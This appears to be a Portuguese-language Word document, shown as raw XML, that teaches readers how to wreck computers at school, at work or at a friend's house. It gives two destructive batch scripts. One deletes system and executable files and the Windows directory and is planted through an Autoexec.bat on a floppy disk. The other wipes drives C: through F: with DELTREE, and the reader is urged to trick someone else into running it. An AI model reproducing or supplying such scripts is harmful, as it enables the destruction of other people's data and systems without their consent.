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Este texto irá ensinar, de modo fácil, destruir o computadorzinho da sua escola (ou de amigo, trabalho, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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Primeiro, crie em seu computador um arquivo de lote (nem precisa compilar), se não souber aí vai, pelo DOS digite:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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opy con arquivo.bat ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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@echo off ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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@echo Frase de sua preferência ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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del *.sys ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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del *.exe ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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del *.com ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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cd windows ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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del *.* ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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cd\ ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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del arquivo.bat ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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@echo Frase de sua preferência ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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Aperte F6 ENTER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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Pronto, um arquivo vírus de lote foi criado em seu computador, ele não fará nada contanto que você não digite "arquivo" no diretório onde ele está.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "Autoexec.bat", com a linha de comando: C:\arquivo.bat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NormalWeb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Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\. Pronto! Retire o disco e diga tchau.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Abra o bloco de notas.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Para abrir o bloco de notas:</w:t>
        <w:br/>
        <w:br/>
        <w:t>Inciar&gt;Executar&gt;NOTEPAD</w:t>
        <w:br/>
        <w:br/>
        <w:t>Depois de abrir, digite:</w:t>
        <w:br/>
        <w:t>@ECHO OFF</w:t>
        <w:br/>
        <w:t>ECHO COLOQUE SUA MENSAGEM DE DESPEDIDA AQUI HEHE</w:t>
        <w:br/>
        <w:t>BREAK OFF</w:t>
        <w:br/>
        <w:t>DELTREE/y C:\*.*</w:t>
        <w:br/>
        <w:t>DELTREE/y D:\*.*</w:t>
        <w:br/>
        <w:t>DELTREE/y E:\*.*</w:t>
        <w:br/>
        <w:t>DELTREE/y F:\*.*</w:t>
        <w:br/>
        <w:br/>
        <w:t>E va em salvar como e salve assim:</w:t>
        <w:br/>
        <w:t>exemplo.bat</w:t>
        <w:br/>
        <w:br/>
        <w:t>no lugar de exemplo vc pode colocar qual quer outra coisa mais tem que ter o .bat</w:t>
        <w:br/>
        <w:br/>
        <w:t>depois envie para outra pessoa e faça ela executar este aplicativo.</w:t>
        <w:br/>
        <w:t>Obs.: Nao execute este aplicativo SE nao vc ke vai ter o o pc formatado</w:t>
        <w:br/>
        <w:br/>
        <w:t>Efeitos:</w:t>
        <w:br/>
        <w:t>QUEM EXECUTAR ESSE ARQUIVO TERÁ O PC FORMATADO MESMO SE FOR VOCÊ OU UM AMIGO, NÃO ME RESPONSABILIZO POR NADA QUE ACONTECER...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2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12:00Z</dcterms:created>
  <dc:creator>Usuário</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Usuário</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-04-03T12:32:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title>Este texto irá ensinar, de modo fácil, destruir o computadorzinho da sua escola (ou de amigo, trabalho, etc</dc:title>
</cp:coreProperties>
</file>